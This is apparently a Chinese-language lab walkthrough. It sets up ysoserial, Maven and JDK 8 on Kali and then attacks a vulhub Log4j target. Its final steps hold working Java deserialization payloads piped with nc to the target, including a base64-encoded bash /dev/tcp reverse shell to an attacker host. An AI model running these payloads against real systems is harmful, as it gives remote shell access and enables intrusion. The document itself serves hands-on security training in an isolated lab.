实验环境要求:
两台kali linux,一台当vulhub靶场,一台当攻击机。
攻击机下载 ysoserial
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests
提示没有mvn
一,安装mvn 下载
- http://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz
复制代码
解压后放到/opt/下
二,安装
- update-alternatives --install /usr/bin/mvn mvn /opt/apache-maven-3.5.4/bin/mvn 1
复制代码
三,配置变量
vim编辑/etc/profile 文件
[Bash shell] 纯文本查看 复制代码 export MAVEN_HOME=/opt/apache-maven-3.5.4
export PATH=${MAVEN_HOME}/bin:$PATH
四,立即生效
[Bash shell] 纯文本查看 复制代码 source /etc/profile
现在mvn已经可以使用了,但是编译的时候依然会报错,我们需要更改jdk环境。
五,卸载kali自带jdk
sudo apt-get remove openjdk-11-jre
sudo apt-get remove openjdk-11-jre-headless
六,下载jdk8
https://www.oracle.com/java/technologies/downloads/
去官网下载
下载解压后移动到/opt/下面
七,编写配置文件 vim /etc/profile
把如下内容加进去
- export JAVA_HOME=/opt/jdk1.8.0_361
- export CLASSPATH=.:${JAVA_HOME}/lib
- export PATH=${JAVA_HOME}/bin:$PATH
复制代码
八,执行以下命令进行安装
sudo update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_361/bin/java 1
sudo update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_361/bin/javac 1
sudo update-alternatives --set java /opt/jdk1.8.0_361/bin/java
sudo update-alternatives --set javac /opt/jdk1.8.0_361/bin/javac
九,继续执行以下命令
- cd ysoserial
- mvn package -D skipTests
复制代码
十:攻击目标log4靶场
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/20230403.txt" | nc 192.168.18.183 4712
十一,成功touch success文件
十一,反弹shell
1)编写执行的命令
bash -i >& /dev/tcp/192.168.18.218/9898 0>&1
2)base64加密后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4LjIxOC85ODk4IDA+JjE=
3)攻击机执行
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4LjIxOC85ODk4IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.18.183 4712
|